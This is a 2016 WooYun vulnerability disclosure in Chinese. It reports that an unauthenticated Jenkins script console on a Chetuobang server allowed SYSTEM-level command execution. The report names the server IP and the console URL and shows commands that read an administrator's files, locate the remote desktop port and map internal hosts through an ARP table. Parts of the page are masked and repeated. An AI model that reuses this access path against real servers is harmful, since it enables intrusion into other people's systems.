车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0188552

漏洞标题：车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

漏洞作者：路人甲

提交时间：2016-03-24 14:16

修复时间：2016-05-08 14:16

公开时间：2016-05-08 14:16

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-03-24：积极联系厂商并且等待厂商认领中，细节不对外公开
2016-05-08：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

详细说明：

mask 区域

*****ang.*****
*****^^最实时的路况、导航等信^*****
**********
*****题^*****
1.http://**.**.**/_
**********
*****ns *****
**********
*****dcda3a845681706285bb.png&qu*****
**********
2.http://**.**.**/job/ctbTest/ws/shiyi/shiyiTest.java/*view*/_
**********
*****strResult =*****
3.://**.**.**//traffic.chetuobang.com/";_
4.://**.**.**//wxlk.chetuobang.com/";_
5.://**.**.**//wxlk-files.chetuobang.com/";_
*****
*****
*****quot;./logs/*****
**********
***** = new *****
*****ew AlarmSend(*****
*****^^*****
6.http://**.**.**/script_
*****m^*****
*****5848a57615d9655054a9.png&qu*****
**********
*****strator\\des*****
*****内容……………^*****
*****d="lnk*****
*****n()">view j*****
*****ginal url:*****
7.://**.**.**//api-sms.chetuobang.com/msg/send">http://api-sms.chetuobang.com/msg/send?</a>_
*****er format*****
8.://**.**.**//api-sms.chetuobang.com/msg/sendformat=json">json</a>_
9.://**.**.**//api-sms.chetuobang.com/msg/sendformat=xml">xml</a>_
10.://**.**.**//api-sms.chetuobang.com/msg/sendformat=csv">csv</a>_
11.://**.**.**//api-sms.chetuobang.com/msg/sendformat=jsv">jsv</a>_
*****;</*****
**********
*****tat找到^*****
**********
*****956aecc35563526915e6.png&qu*****
**********
*****陆^*****
*****027c7486b67678859f28.png&qu*****
**********
*****^^^*****
***** 10.132.41*****
*****^^理地址   *****
*****-3e-03-e2-ff   *****
*****-0c-9f-f0-15   *****
*****-d9-70-9b-c1   *****
*****-d9-70-64-c1   *****
*****-ff-ff-ff-ff   *****
*****-5e-00-00-16   *****
*****-5e-00-00-fc   *****
*****-5e-4d-7c-d5   *****
*****-5e-7f-ff-fa   *****
**********
*****.32.137 *****
*****^^理地址   *****
*****-0c-9f-f0-16   *****
*****-d9-70-9b-c1   *****
*****-d9-70-64-c1   *****
*****-ff-ff-ff-ff   *****
*****-5e-00-00-16   *****
*****-5e-00-00-fb   *****
*****-5e-00-00-fc   *****
*****-5e-4d-7c-d5   *****
*****-ff-fa     静态 *****
**********
*****^已^*****
*****c380167dfb94bc0ba8b802.png*****

漏洞证明：

chetuobang.com
车托帮是国内首款社会化导航应用,为车主提供最好最准最实时的路况、导航等信息服务,1000万车主信赖的社交导航。
存在问题的url
http://121.199.32.137:8080/
jenkins

http://121.199.32.137:8080/job/ctbTest/ws/shiyi/shiyiTest.java/*view*/

String strResult = "";
	String strBaseurl = "http://traffic.chetuobang.com/";
	String strBaseurl1 = "http://wxlk.chetuobang.com/";
	String strBaseurl2 = "http://wxlk-files.chetuobang.com/";
	
	String strFilename = "./logs/log.txt";
	tools Ctools = new tools();
	AlarmSend CalarmSend = new AlarmSend();

命令执行
http://121.199.32.137:8080/script
system权限

type c:\\Users\\Administrator\\desktop\\1.html
…………………………………部分内容………………………………………

<div id="lnks">
  <a href="javascript:showJson()">view json datasource</a>
  <b>from original url:</b>
  <a href="http://api-sms.chetuobang.com/msg/send?">http://api-sms.chetuobang.com/msg/send?</a>
  <b>in other formats:</b>
  <a href="http://api-sms.chetuobang.com/msg/send?format=json">json</a>
  <a href="http://api-sms.chetuobang.com/msg/send?format=xml">xml</a>
  <a href="http://api-sms.chetuobang.com/msg/send?format=csv">csv</a>
  <a href="http://api-sms.chetuobang.com/msg/send?format=jsv">jsv</a>
</div>

tasklist 配合netstat找到远程端口

成功登陆终端

可探测内网

接口: 10.132.41.29 --- 0x12
  Internet 地址         物理地址              类型
  10.132.36.189         00-16-3e-03-e2-ff     动态        
  10.132.47.247         00-00-0c-9f-f0-15     动态        
  10.132.47.248         d8-67-d9-70-9b-c1     动态        
  10.132.47.249         d8-67-d9-70-64-c1     动态        
  10.132.47.255         ff-ff-ff-ff-ff-ff     静态        
  224.0.0.22            01-00-5e-00-00-16     静态        
  224.0.0.252           01-00-5e-00-00-fc     静态        
  239.77.124.213        01-00-5e-4d-7c-d5     静态        
  239.255.255.250       01-00-5e-7f-ff-fa     静态        
接口: 121.199.32.137 --- 0x14
  Internet 地址         物理地址              类型
  121.199.35.247        00-00-0c-9f-f0-16     动态        
  121.199.35.248        d8-67-d9-70-9b-c1     动态        
  121.199.35.249        d8-67-d9-70-64-c1     动态        
  121.199.35.255        ff-ff-ff-ff-ff-ff     静态        
  224.0.0.22            01-00-5e-00-00-16     静态        
  224.0.0.251           01-00-5e-00-00-fb     静态        
  224.0.0.252           01-00-5e-00-00-fc     静态        
  239.77.124.213        01-00-5e-4d-7c-d5     静态        
  239.255.255.250       01-00-5e-7f-ff-fa     静态

测试账号已经删除

修复方案：

验证

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：15 (WooYun评价)

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0188552

漏洞标题：车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

相关厂商：车托帮

漏洞作者：路人甲

提交时间：2016-03-24 14:16

修复时间：2016-05-08 14:16

公开时间：2016-05-08 14:16

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0188552

漏洞标题：车托帮某系统未授权访问导致命令执行/成功登陆终端/可探测内网

相关厂商：车托帮

漏洞作者： 路人甲

提交时间：2016-03-24 14:16

修复时间：2016-05-08 14:16

公开时间：2016-05-08 14:16

漏洞类型：命令执行

危害等级：高

自评Rank：15

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0188552"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云